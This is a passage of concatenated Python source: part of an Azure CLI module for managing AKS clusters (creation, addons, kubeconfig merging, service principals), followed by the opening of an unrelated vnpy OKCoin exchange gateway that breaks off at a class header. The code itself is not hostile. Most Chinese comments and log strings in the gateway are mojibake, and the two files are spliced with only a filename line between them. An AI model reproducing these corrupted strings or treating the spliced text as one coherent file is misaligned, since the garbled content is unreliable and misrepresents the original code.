requests.post('http://localhost:8888/closeport/8001') def _trim_nodepoolname(nodepool_name): if not nodepool_name: return "nodepool1" return nodepool_name[:12] def _validate_ssh_key(no_ssh_key, ssh_key_value): if not no_ssh_key: try: if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value): raise ValueError() except (TypeError, ValueError): shortened_key = truncate_text(ssh_key_value) raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key)) def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals dns_name_prefix=None, location=None, admin_username="azureuser", kubernetes_version='', node_vm_size="Standard_DS2_v2", node_osdisk_size=0, node_count=3, nodepool_name="nodepool1", service_principal=None, client_secret=None, no_ssh_key=False, disable_rbac=None, enable_rbac=None, skip_subnet_role_assignment=False, network_plugin=None, pod_cidr=None, service_cidr=None, dns_service_ip=None, docker_bridge_address=None, enable_addons=None, workspace_resource_id=None, vnet_subnet_id=None, max_pods=0, aad_client_app_id=None, aad_server_app_id=None, aad_server_app_secret=None, aad_tenant_id=None, tags=None, generate_ssh_keys=False, # pylint: disable=unused-argument no_wait=False): _validate_ssh_key(no_ssh_key, ssh_key_value) subscription_id = _get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location agent_pool_profile = ManagedClusterAgentPoolProfile( name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it count=int(node_count), vm_size=node_vm_size, os_type="Linux", storage_profile=ContainerServiceStorageProfileTypes.managed_disks, vnet_subnet_id=vnet_subnet_id, max_pods=int(max_pods) if max_pods else None ) if node_osdisk_size: agent_pool_profile.os_disk_size_gb = int(node_osdisk_size) linux_profile = None # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified. if not no_ssh_key: ssh_config = ContainerServiceSshConfiguration( public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)]) linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config) principal_obj = _ensure_aks_service_principal(cmd.cli_ctx, service_principal=service_principal, client_secret=client_secret, subscription_id=subscription_id, dns_name_prefix=dns_name_prefix, location=location, name=name) service_principal_profile = ContainerServiceServicePrincipalProfile( client_id=principal_obj.get("service_principal"), secret=principal_obj.get("client_secret"), key_vault_secret_ref=None) if (vnet_subnet_id and not skip_subnet_role_assignment and not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)): scope = vnet_subnet_id if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor', service_principal_profile.client_id, scope=scope): logger.warning('Could not create a role assignment for subnet. 
' 'Are you an Owner on this subscription?') network_profile = None if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address]): network_profile = ContainerServiceNetworkProfile( network_plugin=network_plugin, pod_cidr=pod_cidr, service_cidr=service_cidr, dns_service_ip=dns_service_ip, docker_bridge_cidr=docker_bridge_address ) addon_profiles = _handle_addons_args( cmd, enable_addons, subscription_id, resource_group_name, {}, workspace_resource_id ) if 'omsagent' in addon_profiles: _ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent']) aad_profile = None if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]): if aad_tenant_id is None: profile = Profile(cli_ctx=cmd.cli_ctx) _, _, aad_tenant_id = profile.get_login_credentials() aad_profile = ManagedClusterAADProfile( client_app_id=aad_client_app_id, server_app_id=aad_server_app_id, server_app_secret=aad_server_app_secret, tenant_id=aad_tenant_id ) # Check that both --disable-rbac and --enable-rbac weren't provided if all([disable_rbac, enable_rbac]): raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.') mc = ManagedCluster( location=location, tags=tags, dns_prefix=dns_name_prefix, kubernetes_version=kubernetes_version, enable_rbac=False if disable_rbac else True, agent_pool_profiles=[agent_pool_profile], linux_profile=linux_profile, service_principal_profile=service_principal_profile, network_profile=network_profile, addon_profiles=addon_profiles, aad_profile=aad_profile) # Due to SPN replication latency, we do a few retries here max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: return sdk_no_wait(no_wait, client.create_or_update, resource_group_name=resource_group_name, resource_name=name, parameters=mc) except CloudError as ex: retry_exception = ex if 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = _get_subscription_id(cmd.cli_ctx) instance = _update_addons( cmd, instance, subscription_id, resource_group_name, addons, enable=False, no_wait=no_wait ) # send the managed cluster representation to update the addon profiles return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = _get_subscription_id(cmd.cli_ctx) instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True, workspace_resource_id=workspace_resource_id, no_wait=no_wait) if 'omsagent' in instance.addon_profiles: _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent']) # send the managed cluster representation to update the addon profiles return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_get_versions(cmd, client, location): return client.list_orchestrators(location, resource_type='managedClusters') def aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), overwrite_existing=False): credentialResults = None if admin: credentialResults = client.list_cluster_admin_credentials(resource_group_name, name) else: credentialResults = 
client.list_cluster_user_credentials(resource_group_name, name) if not credentialResults: raise CLIError("No Kubernetes credentials found.") else: try: kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8') _print_or_merge_credentials(path, kubeconfig, overwrite_existing) except (IndexError, ValueError): raise CLIError("Fail to find kubeconfig file.") ADDONS = { 'http_application_routing': 'httpApplicationRouting', 'monitoring': 'omsagent' } def aks_list(cmd, client, resource_group_name=None): if resource_group_name: managed_clusters = client.list_by_resource_group(resource_group_name) else: managed_clusters = client.list() return _remove_nulls(list(managed_clusters)) def aks_show(cmd, client, resource_group_name, name): mc = client.get(resource_group_name, name) return _remove_nulls([mc])[0] def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="nodepool1", no_wait=False): instance = client.get(resource_group_name, name) # TODO: change this approach when we support multiple agent pools. for agent_profile in instance.agent_pool_profiles: if agent_profile.name == nodepool_name: agent_profile.count = int(node_count) # pylint: disable=no-member # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, no_wait=False, **kwargs): # pylint: disable=unused-argument instance = client.get(resource_group_name, name) instance.kubernetes_version = kubernetes_version # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) DEV_SPACES_EXTENSION_NAME = 'dev-spaces-preview' DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces_preview.custom' def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False): """ Use Azure Dev Spaces with a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. :type resource_group_name: String :param update: Update to the latest Azure Dev Spaces client components. :type update: bool :param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience. :type space_name: String :param prompt: Do not prompt for confirmation. Requires --space. :type prompt: bool """ if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt) except TypeError: raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.") except AttributeError as ae: raise CLIError(ae) def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False): """ Remove Azure Dev Spaces from a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. 
:type resource_group_name: String :param prompt: Do not prompt for confirmation. :type prompt: bool """ if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt) except AttributeError as ae: raise CLIError(ae) def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None, no_wait=False): # parse the comma-separated addons argument addon_args = addons.split(',') addon_profiles = instance.addon_profiles or {} # for each addons argument for addon_arg in addon_args: addon = ADDONS[addon_arg] if enable: # add new addons or update existing ones and enable them addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False)) # special config handling for certain addons if addon == 'omsagent': if addon_profile.enabled: raise CLIError('The monitoring addon is already enabled for this managed cluster.\n' 'To change monitoring configuration, run "az aks disable-addons -a monitoring"' 'before enabling it again.') if not workspace_resource_id: workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id} addon_profiles[addon] = addon_profile else: if addon not in addon_profiles: raise CLIError("The addon {} is not installed.".format(addon)) addon_profiles[addon].config = None addon_profiles[addon].enabled = enable instance.addon_profiles = addon_profiles # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return instance def _get_azext_module(extension_name, module_name): try: # Adding the installed extension in the path from azure.cli.core.extension.operations import add_extension_to_path add_extension_to_path(extension_name) # Import the extension module from importlib import import_module azext_custom = import_module(module_name) return azext_custom except ImportError as ie: raise CLIError(ie) def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None, workspace_resource_id=None): if not addon_profiles: addon_profiles = {} addons = addons_str.split(',') if addons_str else [] if 'http_application_routing' in addons: addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True) addons.remove('http_application_routing') # TODO: can we help the user find a workspace resource ID? 
if 'monitoring' in addons: if not workspace_resource_id: # use default workspace if exists else create default workspace workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profiles['omsagent'] = ManagedClusterAddonProfile( enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id}) addons.remove('monitoring') # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is elif workspace_resource_id: raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".') # error out if any (unrecognized) addons remain if addons: raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format( ",".join(addons), "are" if len(addons) > 1 else "is")) return addon_profiles def _install_dev_spaces_extension(extension_name): try: from azure.cli.core.extension import operations operations.add_extension(extension_name=extension_name) except Exception: # nopa pylint: disable=broad-except return False return True def _update_dev_spaces_extension(extension_name, extension_module): from azure.cli.core.extension import ExtensionNotInstalledException try: from azure.cli.core.extension import operations operations.update_extension(extension_name=extension_name) operations.reload_extension(extension_name=extension_name) except CLIError as err: logger.info(err) except ExtensionNotInstalledException as err: logger.debug(err) return False except ModuleNotFoundError as err: logger.debug(err) logger.error("Error occurred attempting to load the extension module. 
Use --debug for more information.") return False return True def _get_or_add_extension(extension_name, extension_module, update=False): from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension) try: get_extension(extension_name) if update: return _update_dev_spaces_extension(extension_name, extension_module) except ExtensionNotInstalledException: return _install_dev_spaces_extension(extension_name) return True def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name): # log analytics workspaces cannot be created in WCUS region due to capacity limits # so mapped to EUS per discussion with log analytics team AzureLocationToOmsRegionCodeMap = { "eastus": "EUS", "westeurope": "WEU", "southeastasia": "SEA", "australiasoutheast": "ASE", "usgovvirginia": "USGV", "westcentralus": "EUS", "japaneast": "EJP", "uksouth": "SUK", "canadacentral": "CCA", "centralindia": "CIN", "eastus2euap": "EAP" } AzureRegionToOmsRegionMap = { "australiaeast": "australiasoutheast", "australiasoutheast": "australiasoutheast", "brazilsouth": "eastus", "canadacentral": "canadacentral", "canadaeast": "canadacentral", "centralus": "eastus", "eastasia": "southeastasia", "eastus": "eastus", "eastus2": "eastus", "japaneast": "japaneast", "japanwest": "japaneast", "northcentralus": "eastus", "northeurope": "westeurope", "southcentralus": "eastus", "southeastasia": "southeastasia", "uksouth": "uksouth", "ukwest": "uksouth", "westcentralus": "eastus", "westeurope": "westeurope", "westus": "eastus", "westus2": "eastus", "centralindia": "centralindia", "southindia": "centralindia", "westindia": "centralindia", "koreacentral": "southeastasia", "koreasouth": "southeastasia", "francecentral": "westeurope", "francesouth": "westeurope" } rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) default_region_name = "eastus" default_region_code = "EUS" workspace_region = AzureRegionToOmsRegionMap[ rg_location] if AzureRegionToOmsRegionMap[rg_location] else default_region_name workspace_region_code = AzureLocationToOmsRegionCodeMap[ workspace_region] if AzureLocationToOmsRegionCodeMap[workspace_region] else default_region_code default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code) default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \ '/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name) resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id) resources = cf_resources(cmd.cli_ctx, subscription_id) # check if default RG exists if resource_groups.check_existence(default_workspace_resource_group): try: resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview') return resource.id except CloudError as ex: if ex.status_code != 404: raise ex else: resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region}) default_workspace_params = { 'location': workspace_region, 'properties': { 'sku': { 'name': 'standalone' } } } async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview', default_workspace_params) ws_resource_id = '' while True: result = async_poller.result(15) if async_poller.done(): ws_resource_id = result.id break return ws_resource_id def _ensure_container_insights_for_monitoring(cmd, addon): workspace_resource_id = 
addon.config['logAnalyticsWorkspaceResourceID'] workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') # extract subscription ID and resource group from workspace_resource_id URL try: subscription_id = workspace_resource_id.split('/')[2] resource_group = workspace_resource_id.split('/')[4] except IndexError: raise CLIError('Could not locate resource group in workspace-resource-id URL.') # region of workspace can be different from region of RG so find the location of the workspace_resource_id resources = cf_resources(cmd.cli_ctx, subscription_id) try: resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview') location = resource.location except CloudError as ex: raise ex unix_time_in_millis = int( (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0) solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis) # pylint: disable=line-too-long template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": { "workspaceResourceId": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics Resource ID" } }, "workspaceRegion": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics workspace region" } }, "solutionDeploymentName": { "type": "string", "metadata": { "description": "Name of the solution deployment" } } }, "resources": [ { "type": "Microsoft.Resources/deployments", "name": "[parameters('solutionDeploymentName')]", "apiVersion": "2017-05-10", "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]", "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]", "properties": { "mode": "Incremental", "template": { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": {}, "variables": {}, "resources": [ { "apiVersion": "2015-11-01-preview", "type": "Microsoft.OperationsManagement/solutions", "location": "[parameters('workspaceRegion')]", "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "properties": { "workspaceResourceId": "[parameters('workspaceResourceId')]" }, "plan": { "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "product": "[Concat('OMSGallery/', 'ContainerInsights')]", "promotionCode": "", "publisher": "Microsoft" } } ] }, "parameters": {} } } ] } params = { "workspaceResourceId": { "value": workspace_resource_id }, "workspaceRegion": { "value": location }, "solutionDeploymentName": { "value": solution_deployment_name } } deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis) # publish the Container Insights solution to the Log Analytics workspace return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params, validate=False, no_wait=False, subscription_id=subscription_id) def _ensure_aks_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): file_name_aks = 'aksServicePrincipal.json' # TODO: This really needs to be unit tested. 
rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, try to load it from local disk principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks) if principal_obj: service_principal = principal_obj.get('service_principal') client_secret = principal_obj.get('client_secret') else: # Nothing to load, make one. if not client_secret: client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # We don't need to add role assignment for this created SPN else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks) return load_acs_service_principal(subscription_id, file_name=file_name_aks) def _ensure_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, try to load it from local disk principal_obj = load_acs_service_principal(subscription_id) if principal_obj: service_principal = principal_obj.get('service_principal') client_secret = principal_obj.get('client_secret') else: # Nothing to load, make one. if not client_secret: client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # add role first before save it if not _add_role_assignment(cli_ctx, 'Contributor', service_principal): logger.warning('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') store_acs_service_principal(subscription_id, client_secret, service_principal) return load_acs_service_principal(subscription_id) def _get_rg_location(ctx, resource_group_name, subscription_id=None): groups = cf_resource_groups(ctx, subscription_id=subscription_id) # Just do the get, we don't need the result, it will error out if the group doesn't exist. rg = groups.get(resource_group_name) return rg.location def _print_or_merge_credentials(path, kubeconfig, overwrite_existing): """Merge an unencrypted kubeconfig into the file at the specified path, or print it to stdout if the path is "-". 
""" # Special case for printing to stdout if path == "-": print(kubeconfig) return # ensure that at least an empty ~/.kube/config exists directory = os.path.dirname(path) if directory and not os.path.exists(directory): try: os.makedirs(directory) except OSError as ex: if ex.errno != errno.EEXIST: raise if not os.path.exists(path): with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'): pass # merge the new kubeconfig into the existing one fd, temp_path = tempfile.mkstemp() additional_file = os.fdopen(fd, 'w+t') try: additional_file.write(kubeconfig) additional_file.flush() merge_kubernetes_configurations(path, temp_path, overwrite_existing) except yaml.YAMLError as ex: logger.warning('Failed to merge credentials to kube config file: %s', ex) finally: additional_file.close() os.remove(temp_path) def _remove_nulls(managed_clusters): """ Remove some often-empty fields from a list of ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. """ attrs = ['tags'] ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id'] sp_attrs = ['secret'] for managed_cluster in managed_clusters: for attr in attrs: if getattr(managed_cluster, attr, None) is None: delattr(managed_cluster, attr) for ap_profile in managed_cluster.agent_pool_profiles: for attr in ap_attrs: if getattr(ap_profile, attr, None) is None: delattr(ap_profile, attr) for attr in sp_attrs: if getattr(managed_cluster.service_principal_profile, attr, None) is None: delattr(managed_cluster.service_principal_profile, attr) return managed_clusters def _validate_aci_location(norm_location): """ Validate the Azure Container Instance location """ aci_locations = [ "centralus", "eastus", "eastus2", "westus", "westus2", "northeurope", "westeurope", "southeastasia", "australiaeast" ] if norm_location not in aci_locations: raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) + ' The available locations are "{}"'.format(','.join(aci_locations)))
okcoinGateway.py
# encoding: UTF-8 ''' Gateway adapter for vn.okcoin. Note: 1. Currently only spot trading in USD and CNY is supported; USD futures contract trading is not supported yet. ''' import os import json from datetime import datetime from time import sleep from copy import copy from threading import Condition from Queue import Queue from threading import Thread from time import sleep from vnpy.api.okcoin import vnokcoin from vnpy.trader.vtGateway import * from vnpy.trader.vtFunction import getJsonPath # Price type mapping priceTypeMap = {} priceTypeMap['buy'] = (DIRECTION_LONG, PRICETYPE_LIMITPRICE) priceTypeMap['buy_market'] = (DIRECTION_LONG, PRICETYPE_MARKETPRICE) priceTypeMap['sell'] = (DIRECTION_SHORT, PRICETYPE_LIMITPRICE) priceTypeMap['sell_market'] = (DIRECTION_SHORT, PRICETYPE_MARKETPRICE) priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()} # Direction type mapping directionMap = {} directionMapReverse = {v: k for k, v in directionMap.items()} # Order status mapping statusMap = {} statusMap[-1] = STATUS_CANCELLED statusMap[0] = STATUS_NOTTRADED statusMap[1] = STATUS_PARTTRADED statusMap[2] = STATUS_ALLTRADED statusMap[4] = STATUS_UNKNOWN ############################################ ## Trading contract codes ############################################ # USD BTC_USD_SPOT = 'BTC_USD_SPOT' BTC_USD_THISWEEK = 'BTC_USD_THISWEEK' BTC_USD_NEXTWEEK = 'BTC_USD_NEXTWEEK' BTC_USD_QUARTER = 'BTC_USD_QUARTER' LTC_USD_SPOT = 'LTC_USD_SPOT' LTC_USD_THISWEEK = 'LTC_USD_THISWEEK' LTC_USD_NEXTWEEK = 'LTC_USD_NEXTWEEK' LTC_USD_QUARTER = 'LTC_USD_QUARTER' ETH_USD_SPOT = 'ETH_USD_SPOT' ETH_USD_THISWEEK = 'ETH_USD_THISWEEK' ETH_USD_NEXTWEEK = 'ETH_USD_NEXTWEEK' ETH_USD_QUARTER = 'ETH_USD_QUARTER' # CNY BTC_CNY_SPOT = 'BTC_CNY_SPOT' LTC_CNY_SPOT = 'LTC_CNY_SPOT' ETH_CNY_SPOT = 'ETH_CNY_SPOT' # Symbol mapping dictionary spotSymbolMap = {} spotSymbolMap['ltc_usd'] = LTC_USD_SPOT spotSymbolMap['btc_usd'] = BTC_USD_SPOT spotSymbolMap['eth_usd'] = ETH_USD_SPOT spotSymbolMap['ltc_cny'] = LTC_CNY_SPOT spotSymbolMap['btc_cny'] = BTC_CNY_SPOT spotSymbolMap['eth_cny'] = ETH_CNY_SPOT spotSymbolMapReverse = {v: k for k, v in spotSymbolMap.items()} ############################################ ## Channel-to-symbol mapping ############################################ channelSymbolMap = {} # USD channelSymbolMap['ok_sub_spotusd_btc_ticker'] = BTC_USD_SPOT channelSymbolMap['ok_sub_spotusd_ltc_ticker'] = LTC_USD_SPOT channelSymbolMap['ok_sub_spotusd_eth_ticker'] = ETH_USD_SPOT channelSymbolMap['ok_sub_spotusd_btc_depth_20'] = BTC_USD_SPOT channelSymbolMap['ok_sub_spotusd_ltc_depth_20'] = LTC_USD_SPOT channelSymbolMap['ok_sub_spotusd_eth_depth_20'] = ETH_USD_SPOT # CNY channelSymbolMap['ok_sub_spotcny_btc_ticker'] = BTC_CNY_SPOT channelSymbolMap['ok_sub_spotcny_ltc_ticker'] = LTC_CNY_SPOT channelSymbolMap['ok_sub_spotcny_eth_ticker'] = ETH_CNY_SPOT channelSymbolMap['ok_sub_spotcny_btc_depth_20'] = BTC_CNY_SPOT channelSymbolMap['ok_sub_spotcny_ltc_depth_20'] = LTC_CNY_SPOT channelSymbolMap['ok_sub_spotcny_eth_depth_20'] = ETH_CNY_SPOT ######################################################################## class OkcoinGateway(VtGateway): """OKCoin gateway interface""" #---------------------------------------------------------------------- def __init__(self, eventEngine, gatewayName='OKCOIN'): """Constructor""" super(OkcoinGateway, self).__init__(eventEngine, gatewayName) self.api = Api(self) self.leverage = 0 self.connected = False self.fileName = self.gatewayName + '_connect.json' self.filePath = getJsonPath(self.fileName, __file__) 
#---------------------------------------------------------------------- def connect(self): """่ฟžๆŽฅ""" # ่ฝฝๅ…ฅjsonๆ–‡ไปถ try: f = file(self.filePath) except IOError: log = VtLogData() log.gatewayName = self.gatewayName log.logContent = u'่ฏปๅ–่ฟžๆŽฅ้…็ฝฎๅ‡บ้”™๏ผŒ่ฏทๆฃ€ๆŸฅ' self.onLog(log) return # ่งฃๆžjsonๆ–‡ไปถ setting = json.load(f) try: host = str(setting['host']) apiKey = str(setting['apiKey']) secretKey = str(setting['secretKey']) trace = setting['trace'] leverage = setting['leverage'] except KeyError: log = VtLogData() log.gatewayName = self.gatewayName log.logContent = u'่ฟžๆŽฅ้…็ฝฎ็ผบๅฐ‘ๅญ—ๆฎต๏ผŒ่ฏทๆฃ€ๆŸฅ' self.onLog(log) return # ๅˆๅง‹ๅŒ–ๆŽฅๅฃ self.leverage = leverage if host == 'CNY': host = vnokcoin.OKCOIN_CNY else: host = vnokcoin.OKCOIN_USD self.api.active = True self.api.connect(host, apiKey, secretKey, trace) log = VtLogData() log.gatewayName = self.gatewayName log.logContent = u'ๆŽฅๅฃๅˆๅง‹ๅŒ–ๆˆๅŠŸ' self.onLog(log) # ๅฏๅŠจๆŸฅ่ฏข self.initQuery() self.startQuery() #---------------------------------------------------------------------- def subscribe(self, subscribeReq): """่ฎข้˜…่กŒๆƒ…""" pass #---------------------------------------------------------------------- def sendOrder(self, orderReq): """ๅ‘ๅ•""" return self.api.spotSendOrder(orderReq) #---------------------------------------------------------------------- def cancelOrder(self, cancelOrderReq): """ๆ’คๅ•""" self.api.spotCancel(cancelOrderReq) #---------------------------------------------------------------------- def qryAccount(self): """ๆŸฅ่ฏข่ดฆๆˆท่ต„้‡‘""" self.api.spotUserInfo() #---------------------------------------------------------------------- def qryPosition(self): """ๆŸฅ่ฏขๆŒไป“""" pass #---------------------------------------------------------------------- def close(self): """ๅ…ณ้—ญ""" self.api.active = False self.api.close() #---------------------------------------------------------------------- def initQuery(self): """ๅˆๅง‹ๅŒ–่ฟž็ปญๆŸฅ่ฏข""" if self.qryEnabled: # ้œ€่ฆๅพช็Žฏ็š„ๆŸฅ่ฏขๅ‡ฝๆ•ฐๅˆ—่กจ self.qryFunctionList = [self.qryAccount] self.qryCount = 0 # ๆŸฅ่ฏข่งฆๅ‘ๅ€’่ฎกๆ—ถ self.qryTrigger = 2 # ๆŸฅ่ฏข่งฆๅ‘็‚น self.qryNextFunction = 0 # ไธŠๆฌก่ฟ่กŒ็š„ๆŸฅ่ฏขๅ‡ฝๆ•ฐ็ดขๅผ• self.startQuery() #---------------------------------------------------------------------- def query(self, event): """ๆณจๅ†Œๅˆฐไบ‹ไปถๅค„็†ๅผ•ๆ“ŽไธŠ็š„ๆŸฅ่ฏขๅ‡ฝๆ•ฐ""" self.qryCount += 1 if self.qryCount > self.qryTrigger: # ๆธ…็ฉบๅ€’่ฎกๆ—ถ self.qryCount = 0 # ๆ‰ง่กŒๆŸฅ่ฏขๅ‡ฝๆ•ฐ function = self.qryFunctionList[self.qryNextFunction] function() # ่ฎก็ฎ—ไธ‹ๆฌกๆŸฅ่ฏขๅ‡ฝๆ•ฐ็š„็ดขๅผ•๏ผŒๅฆ‚ๆžœ่ถ…่ฟ‡ไบ†ๅˆ—่กจ้•ฟๅบฆ๏ผŒๅˆ™้‡ๆ–ฐ่ฎพไธบ0 self.qryNextFunction += 1 if self.qryNextFunction == len(self.qryFunctionList): self.qryNextFunction = 0 #---------------------------------------------------------------------- def startQuery(self): """ๅฏๅŠจ่ฟž็ปญๆŸฅ่ฏข""" self.eventEngine.register(EVENT_TIMER, self.query) #---------------------------------------------------------------------- def setQryEnabled(self, qryEnabled): """่ฎพ็ฝฎๆ˜ฏๅฆ่ฆๅฏๅŠจๅพช็ŽฏๆŸฅ่ฏข""" self.qryEnabled = qryEnabled ######################################################################## class Api(vnokcoin.OkCoinApi): """OkCoin็š„APIๅฎž็Žฐ""" 